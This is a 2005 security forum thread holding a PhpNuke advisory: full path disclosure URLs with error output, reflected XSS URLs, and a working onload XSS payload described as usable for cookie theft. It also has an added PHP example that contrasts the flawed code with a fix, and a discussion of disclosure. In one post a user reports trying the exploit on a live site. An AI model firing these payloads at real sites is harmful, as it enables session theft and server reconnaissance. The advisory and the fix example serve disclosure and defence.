Waraxe IT Security Portal
waraxe-2005-SA#040 - Full path disclosure and XSS in PhpNuke
Posted: Mon Feb 14, 2005 10:20 pm by waraxe (Site admin, joined May 11, 2004, posts: 2407, location: Estonia, Tartu)

Author: Janek Vind "waraxe"
Date: 14. February 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-40.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in PHP by
Francisco Burzi. This CMS is used on many thousands of websites, because it's
freeware, easy to install and manage, and has a broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "db/db.php":

http://localhost/nuke75/db/db.php

Fatal error: Cannot instantiate non-existent class:
sql_db in D:\apache_wwwroot\nuke75\db\db.php
on line 86


A2 - full path disclosure in "mainfile.php":

http://localhost/nuke75/index.php?inside_mod=1

Warning: main(../../config.php): failed to open stream:
No such file or directory in D:\apache_wwwroot\nuke75\mainfile.php
on line 103

Fatal error: main(): Failed opening required '../../config.php'
(include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke75\mainfile.php
on line 10


A3 - full path disclosure in "modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=menu

error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Downloads\index.php on line 75



A4 - full path disclosure in "modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu

Fatal error: Call to undefined function: opentable() in
D:\apache_wwwroot\nuke75\modules\Web_Links\index.php on line 65



B - Cross-Site Scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

B1 - xss in "/modules/Downloads/index.php":

http://localhost/nuke75/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=[xss code here]


B2 - xss in "/modules/Web_Links/index.php":

http://localhost/nuke75/modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=[xss code here]



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


How to fix those bugs - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Base64 encoder and decoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
new version 0.2 available for download - http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to icenix, Raido Kerna, g0df4th3r and slimjim100!
Tervitused - Heintz!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Sun Feb 12, 2006 11:07 pm; edited 1 time in total

Posted: Tue Feb 15, 2005 4:23 pm by MaDeRkAn (Regular user, joined Feb 15, 2005, posts: 5)

Can you give me an example of XSS code here, and what do I need to know about XSS code? I'm a beginner at this part.

_________________
NoTHinG is SeCuRe

Posted: Tue Feb 15, 2005 7:13 pm by sp3x (Valuable expert, joined Feb 15, 2005, posts: 10)

I have a question for waraxe....

Where can I report bugs in phpnuke.... Is there any mail address for them??
And also the same question, but for postnuke...

Thanks for the info...
Posted: Tue Feb 15, 2005 8:28 pm by waraxe (Site admin, joined May 11, 2004, posts: 2407, location: Estonia, Tartu)

MaDeRkAn wrote:
Can you give me an example of XSS code here, and what do I need to know about XSS code? I'm a beginner at this part.


Phpnuke has some countermeasures against trivial XSS attacks.
I tried some attack forms, and one that works in many places:

http://www.*****.com/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=aa<body%20onload=alert(123)>

This is just a proof of concept; it will not do any real "work". But
it can be used, for example, as a cookie thief.
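The pattern behind findings A and B in the advisory above, and what the aa<body onload=alert(123)> payload from this reply does to it, as an added PHP example that is neither PhpNuke's code nor waraxe's. The handler shape, the tag blacklist standing in for a "html tags not allowed" filter, the 7-day default and the use of ini_set() instead of php.ini are assumptions for illustration; modules/Downloads/index.php is not reproduced here.

```php
<?php
// Added example, not PhpNuke code. Sketches the vulnerable pattern behind
// waraxe-2005-SA#040 (B1/B2) and a hardened form, then runs the thread's PoC
// payload through each. Handler, blacklist and default are assumptions.

// --- Part A: full path disclosure is a configuration problem -----------------
// Messages like "Fatal error: ... in D:\apache_wwwroot\nuke75\db\db.php" reach
// the browser only while display_errors is on. In production put these two
// settings in php.ini; ini_set() is used here so the script is self-contained.
ini_set('display_errors', '0');   // never render PHP errors into the response
ini_set('log_errors', '1');       // keep them, but in the server log
error_reporting(E_ALL);

// --- Part B: reflected XSS via newdownloadshowdays ---------------------------

// Vulnerable: the GET parameter is echoed straight into HTML (assumed shape).
function render_vulnerable(string $days): string {
    return "<b>New downloads of the last $days days</b>";
}

// A tag blacklist of the kind that answers "The html tags you attempted to
// use are not allowed" (constructed; PhpNuke's real filter is not reproduced).
// It rejects <script> but says nothing about <body onload=...>, which is why
// a blacklist can refuse some probes and still let the thread's PoC through.
function render_blacklisted(string $days): string {
    if (preg_match('/<\s*\/?\s*(script|iframe|img)\b/i', $days)) {
        return 'The html tags you attempted to use are not allowed';
    }
    return render_vulnerable($days);
}

// Fixed: the value is a number of days, so validate it as a small integer
// and, belt and braces, HTML-encode it at the output point.
function render_fixed(string $days): string {
    if (!preg_match('/^\d{1,4}$/', $days)) {
        $days = '7';                          // assumed default
    }
    $safe = htmlspecialchars($days, ENT_QUOTES, 'UTF-8');
    return "<b>New downloads of the last $safe days</b>";
}

// Reflection check: does the response still carry the probe byte-for-byte?
// Raw reflection of a tag is the condition under which the PoC fires.
function reflected_raw(string $probe, string $body): bool {
    return strpos($body, $probe) !== false;
}

$poc = 'aa<body onload=alert(123)>';   // waraxe's PoC from this thread
foreach (['vulnerable' => 'render_vulnerable',
          'blacklist'  => 'render_blacklisted',
          'fixed'      => 'render_fixed'] as $name => $fn) {
    $out = $fn($poc);
    printf("%-10s reflected raw: %-3s | %s\n",
        $name, reflected_raw($poc, $out) ? 'yes' : 'no', $out);
}
```

Run it with `php` on the command line: the vulnerable and blacklist variants both still contain the raw `<body onload=...>` tag, while the fixed variant falls back to `7 days`. Validating the parameter as an integer is what actually closes the hole; the `htmlspecialchars()` call covers the case where a later edit relaxes that validation. The blacklist variant illustrates why "the tags you attempted to use are not allowed" on one probe says nothing about the next one.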
Posted: Tue Feb 15, 2005 8:40 pm by waraxe (Site admin, joined May 11, 2004, posts: 2407, location: Estonia, Tartu)

sp3x wrote:
I have a question for waraxe....

Where can I report bugs in phpnuke.... Is there any mail address for them??
And also the same question, but for postnuke...

Thanks for the info...


Phpnuke is unique software, because there is a very big number of
various derivations, versions, editions, patches, etc...
And if you try to contact Francisco Burzi himself, you
just will not get any answer. So if I discover some major security
hole in most of the phpnuke versions, then what can I do - try to
contact all of the derivation authors? It's impossible...
So in the case of phpnuke I will just release a public advisory to
securityfocus, secunia and other lists, and patches will be coming out
soon, that's for sure. Of course, many sites will get hurt because of the
phpnuke insecurity (before they are patched), but that's life.
Postnuke authors are far more concerned about security and
they can be contacted before a public advisory, so they can develop a
patch before attacks go wild. Look here:

http://waraxe.us/ftopict-18.html
Hi Waraxe
Posted: Wed Feb 16, 2005 8:47 am by Zeelock (Active user, joined Jan 27, 2005, posts: 29, location: Where stars come out at night)

The developer is Francesco Burzi, not Francisco ;->

I always like your work. You should do some workshops as well.

The rest of the world should learn from you.

Cheers

_________________
If it seems to be impossible, just step up your level!

Posted: Wed Feb 16, 2005 9:31 pm by sp3x (Valuable expert, joined Feb 15, 2005, posts: 10)

Hmmm, this is very bad...
So you suggest posting the bugs to bugtraq??

With no contact with the phpnuke team...

I have some bugs, and they are critical too.

What do you suggest??

Thanks for the help...
Posted: Wed Feb 16, 2005 9:38 pm by waraxe (Site admin, joined May 11, 2004, posts: 2407, location: Estonia, Tartu)

sp3x wrote:
Hmmm, this is very bad...
So you suggest posting the bugs to bugtraq??

With no contact with the phpnuke team...

I have some bugs, and they are critical too.

What do you suggest??

Thanks for the help...


No, I suggest trying to contact the phpnuke team, of course.
What I am saying is that I personally have had bad experience with reporting phpnuke security bugs to the developers. That's my personal experience, and
to you I suggest trying to report security problems according to good traditions.
Posted: Wed Feb 16, 2005 10:17 pm by sp3x (Valuable expert, joined Feb 15, 2005, posts: 10)

Thanks :)
But how??
Is there any mail address for them.... On their site I don't see any contact for reporting bugs...
Posted: Mon Mar 14, 2005 6:42 pm by KingOfSka (Advanced user, joined Mar 13, 2005, posts: 61)

I'm testing this exploit on a site. The full path exploit works, but the XSS injection always says "The html tags you attempted to use are not allowed", and I've tried many ways...
Any idea?

All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"